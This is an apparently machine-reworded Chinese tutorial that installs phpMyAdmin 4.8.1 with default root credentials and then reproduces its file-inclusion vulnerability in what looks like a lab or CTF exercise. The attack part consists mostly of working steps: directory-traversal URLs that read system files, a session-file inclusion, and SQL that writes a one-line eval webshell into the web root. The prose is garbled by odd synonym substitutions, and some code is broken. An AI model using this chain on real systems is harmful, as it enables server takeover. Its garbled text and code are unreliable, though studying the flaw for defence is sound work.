phpMyAdmin是一种MySQL数据库的管理工具,安装该工具后,即可通过Web形式直接管理MySQL数据,而不须要通过实行系统命令来管理,非常适宜对数据库操作命令不熟习的数据库管理者,下面详细解释该工具的安装方法。
第一步,下载phpMyAdmin 4.8.1。
第二步,配置环境。打开libraries目录下的config.default.php文件,依次找到下面各项,按照解释配置即可。
修正MySQL的用户名和密码,phpMyAdmin利用MySQL默认用户名root,密码设置为“123456”。
/ MySQL user @global string $cfg[39;Servers'][$i]['user'] /$cfg['Servers'][$i]['user'] = 'root';/ MySQL password (only needed with 'config' auth_type) @global string $cfg['Servers'][$i]['password'] /$cfg['Servers'][$i]['password'] = '123456';
认证方法设置为“cookie”,登录phpMyAdmin时须要用户名和密码进行验证。在此有cookie、http、signon、config四种模式可供选择。
/ Authentication method (valid choices: config, http, signon or cookie) @global string $cfg['Servers'][$i]['auth_type'] /$cfg['Servers'][$i]['auth_type'] = 'cookie';
第三步,运行WAMP软件,并将WAMP中phpMyAdmin更换成4.8.1版本。
更换如下图所示:
运行Apache和MySQL如下图所示。
问题1: 当我们输入用户名“root”、密码“123456”时,很可能会报错“mysqli_real_connect(): (HY000/1045): Access denied for user ‘root’@‘localhost’ (using password: YES)”。提示是缺点1045,见告我们缺点是由于没有访问权限,以是访问被谢绝了,紧张缘故原由便是由于该用户名所对应的密码缺点。
第四步,检讨配置文件中的主机、用户名和密码,并确认这些信息与 MySQL 做事器管理员所给出的信息同等。设置controluser和controlpass。
/ MySQL control user settings (this user must have read-only access to the "mysql/user" and "mysql/db" tables). The controluser is also used for all relational features (pmadb) @global string $cfg['Servers'][$i]['controluser'] /$cfg['Servers'][$i]['controluser'] = 'root';/ MySQL control user settings (this user must have read-only access to the "mysql/user" and "mysql/db" tables). The controluser is also used for all relational features (pmadb) @global string $cfg['Servers'][$i]['controlpass'] /$cfg['Servers'][$i]['controlpass'] = '123456';
第五步,修正“config.sample.inc.php”(或config.inc.php)文件内容。
设置controluser和controlpass值。
修正如下:
$cfg['Servers'][$i]['controluser'] = 'root';$cfg['Servers'][$i]['controlpass'] = '123456';$cfg['Servers'][$i]['user'] = 'root';$cfg['Servers'][$i]['password'] = '123456';
第六步,接着登录phpMyAdmin,输入“root”和“123456”之后进入数据库管理主界面。
二.phpMyAdmin根本用法
接着我们利用phpMyAdmin搭建一个大略的网站试试。
第一步,创建数据库。
第二步,创建数据表 student,点击实行。
第三步,设置表的字段,包括:id、username、password。
第四步,查看我们创建好的数据表student。
第五步,插入数据并查询。
INSERT INTO `student`(`id`, `username`, `password`) VALUES ('1', 'yangxiuzhang','6666666');INSERT INTO `student`(`id`, `username`, `password`) VALUES ('2', 'Eastmountain','123456');
此时数据显示如下图所示:
第六步,编写PHP代码将我们数据库中的内容显示出来。
访问地址:http://localhost:8088/20200110.php
<?phpecho('<h2>数据库测试</h2>');//链接数据库$con = mysqli_connect("localhost", "root", "123456", "eastmount"); if (!$con) { die('Could not connect database: ' . mysqli_error()); } //设置查询结果编码$con->set_charset('utf8'); //查询学生信息$sql = "SELECT FROM `student` ";//得到查询结果$result = $con->query($sql); //遍历结果while($row = $result->fetch_array()){ list($id,$username, $password) = $row;echo $id.' ';echo $username.' ';echo $password;echo '<br >';} //关闭连接$con->close(); ?>
显示结果如下图所示:
如果须要查看配置信息,这利用“phpinfo()”函数实现。
<?phpphpinfo();?>
显示结果如下图所示,PHP的配置信息。
写到这里,我们的环境已经搭建成功,接下来我们开始讲解phpMyAdmin漏洞吧。可能很多博友会迷惑,为什么前面花费这么多韶光讲解环境搭建了,两个缘故原由吧!
一方面作者是从零开始学习,通过环境搭建来复现该漏洞;另一方面照顾初学者,希望通过普通易懂的步骤能实现文章的实验,也希望安全圈的大牛们别笑,哈哈~都是一点一滴发展起来的。
缘故原由:phpMyadmin 4.8.1版本的index.php中存在文件包含漏洞,通过二次编码可绕过过滤。
第一步,根据该版本CVE漏洞布局URL,在index.php后添加内容,如显示/etc/passwd详细内容。
/ 方法一 /http://localhost:8088/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd/ 方法二 /http://localhost:8088/phpmyadmin/index.php?target=db_datadict.php%253f/../../../../../../../../../Windows/DATE.ini
第二步,通过目录穿越包含任意文件。
第三步,实行SQL语句查询数据库路径。结果为:C:\xampp\mysql\data\。
show global variables like "%datadir%";
第四步,向数据库写入php代码。创建数据库rce和表rce,并插入php代码。
CREATE DATABASE rce;use rce;CREATE TABLE rce(code varchar(100));INSERT INTO rce(code) VALUES("<?php phpinfo(); ?>");
输出结果如下图所示:
然后我们可以看到插入的php代码,如下所示。
第五步,在SQL中实行select ‘<?php phpinfo() ?>’,然后查看当前页面cookie中的phpmyadmin的值。
通过浏览器查看网络的Cookie值。
第六步,构建包含Session值的URL路径。F12查看网站Session值,访问/index.php?target=db_sql.php%253f/…/…/…/…/…/…/tmp/sess_[session]。
?target=db_datadict.php%253f/../../../../../../../../../phpStudy/PHPTutorial/tmp/tmp/sess_imnnv91q886sfboa2sqos02b7njvho24
访问能显示如下图所示的信息:
第七步,在phpInfo默认页面找到网站的安装位置:/var/www/html,然后写入一句话木马。
select '<?php @eval($_POST[hcl]) ?>' into outfile '/var/www/html/hcl.php'
第八步,通过菜刀连接 http://ip/hcl.php。菜刀连接成功,在根目录下找到了key.txt文件,查看key.txt文件,得到key值。
大略总结:
利用phpMyAdmin 4.8.1后台文件包含漏洞,获取登录phpmyadmin系统所产生的sess_sessionID文件,然后通过文件绕过获取干系信息并植入木马,终极获取webshell。常日linux系统中存放路径为/tmp/sess_[当前会话session值]。
四.漏洞事理在phpMyAdmin 4.8.1版本的index.php文件中,第50-63行代码如下:
$target_blacklist = array ( 'import.php', 'export.php');// If we have a valid target, let's load that script insteadif (! empty($_REQUEST['target']) && is_string($_REQUEST['target']) && ! preg_match('/^index/', $_REQUEST['target']) && ! in_array($_REQUEST['target'], $target_blacklist) && Core::checkPageValidity($_REQUEST['target'])) { include $_REQUEST['target']; exit;}
它的含义是:
target传入不能为空
target必须是一个字符串
target不能以index开头
target不能在数组target_blacklist中
target经由checkPageValidit检讨后为真
前面三个大家都随意马虎理解,第四个判断是黑名单判断。在index.php中已经定义好了target_blacklist的值,它们是import.php和export.php,只要不即是这两个值就可以。
再看第五个判断,Core::checkPageValidity($_REQUEST[‘target’]为真,通过全局搜索创造了代码在libraries\classes\Core.php文件的第443-476行。
public static function checkPageValidity(&$page, array $whitelist = []){ if (empty($whitelist)) { $whitelist = self::$goto_whitelist; } if (! isset($page) || !is_string($page)) { return false; } if (in_array($page, $whitelist)) { return true; } $_page = mb_substr( $page, 0, mb_strpos($page . '?', '?') ); if (in_array($_page, $whitelist)) { return true; } $_page = urldecode($page); $_page = mb_substr( $_page, 0, mb_strpos($_page . '?', '?') ); if (in_array($_page, $whitelist)) { return true; } return false;}
在checkPageValidit中有两个形参,第一个是传入的target,第二个whitelist则有默认形参,也便是空的数组。进入函数首先会判断whitelist是否为空,如果为空则将定义的goto_whitelist赋值给whitelist(由于确实为空,我们只传进去一个target)。接着我们来看看goto_whitelist的代码。
public static $goto_whitelist = array( 'db_datadict.php', 'db_sql.php', 'db_events.php', 'db_export.php', 'db_importdocsql.php', 'db_multi_table_query.php', 'db_structure.php', 'db_import.php', 'db_operations.php', 'db_search.php', 'db_routines.php', 'export.php', 'import.php', 'index.php', 'pdf_pages.php', 'pdf_schema.php', 'server_binlog.php', 'server_collations.php', 'server_databases.php', 'server_engines.php', 'server_export.php', 'server_import.php', 'server_privileges.php', 'server_sql.php', 'server_status.php', 'server_status_advisor.php', 'server_status_monitor.php', 'server_status_queries.php', 'server_status_variables.php', 'server_variables.php', 'sql.php', 'tbl_addfield.php', 'tbl_change.php', 'tbl_create.php', 'tbl_import.php', 'tbl_indexes.php', 'tbl_sql.php', 'tbl_export.php', 'tbl_operations.php', 'tbl_structure.php', 'tbl_relation.php', 'tbl_replace.php', 'tbl_row_action.php', 'tbl_select.php', 'tbl_zoom_select.php', 'transformation_overview.php', 'transformation_wrapper.php', 'user_password.php',);
接着剖析代码,如果page在白名单中就会直接return true,但这里考虑到了可能带参数的情形,以是有了下面的判断。
下图的代码中,mb_strpos函数是查找string在另一个string中首次涌现的位置。_page变量是获取page问号前的内容,是考虑到target有参数的情形,只要_page在白名单中就直接return true。但还考虑了url编码的情形,以是如果这步判断未成功,下一步又进行url解码。
当传入二次编码后的内容,会让checkPageValidity()这个函数返回true,但index中实际包含的内容却不是白名单中的文件。
例如:传入“?target=db_datadict.php%253f ”,由于做事器会自动解码一次,以是在checkPageValidity()中,page的值一开始会是“db_datadict.php%3f”,又一次url解码后变成了“db_datadict.php?”,这时符合了?前内容在白名单的哀求,函数返回true。
但在index.php中_REQUEST[‘target’]仍旧是“db_datadict.php%3f”,而且会被include,通过目录穿越,就可造成任意文件包含。终极通过该漏洞实现了上述攻击,这个漏洞也很快被修复并发布新版本。
五.总结写到这里,这篇根本性文章就此结束,希望文章对您有所帮助。本文利用phpMyAdmin 4.8.1后台文件包含漏洞,获取登录phpmyadmin系统所产生的sess_sessionID文件,然后通过文件绕过获取干系信息并植入木马,终极获取webshell。同时,此漏洞是上岸后才可以利用的,比较鸡肋。一样平常上岸后直接实行SQL语句天生shell即可,但有时目录权限比较严格,不能在WEB目录内天生,则可以结合本例利用。